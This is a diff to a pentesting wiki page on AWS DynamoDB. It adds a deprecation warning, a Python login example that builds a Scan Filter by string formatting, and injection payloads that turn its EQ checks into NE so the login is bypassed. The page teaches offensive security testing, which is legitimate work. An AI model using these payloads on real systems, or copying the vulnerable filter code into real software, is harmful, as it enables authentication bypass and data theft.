GITBOOK-612: No subject

pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md

@@ -123,6 +123,10 @@ If you can **change the comparison** performed or add new ones, you could retrie
 
 ### Raw Json injection
 
+{% hint style="danger" %}
+**This vulnerability is based on dynamodb Scan Filter which is now deprecated!**
+{% endhint %}
+
 **DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents.
 
 For example, injecting in a request like:
@@ -139,6 +143,31 @@ an attacker could inject something like:
 
 fix the "EQ" condition searching for the ID 1000 and then looking for all the data with a Id string greater and 0, which is all.
 
+Another **vulnerable example using a login** could be:
+
+```python
+scan_filter = """{
+ "username": {
+ "ComparisonOperator": "EQ",
+ "AttributeValueList": [{"S": "%s"}]
+ },
+ "password": {
+ "ComparisonOperator": "EQ",
+ "AttributeValueList": [{"S": "%s"}]
+ }
+}
+""" % (user_data['username'], user_data['password'])
+
+dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter))
+```
+
+This would be vulnerable to:
+
+```
+username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none
+password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none
+```
+
 ### :property Injection
 
 Some SDKs allows to use a string indicating the filtering to be performed like: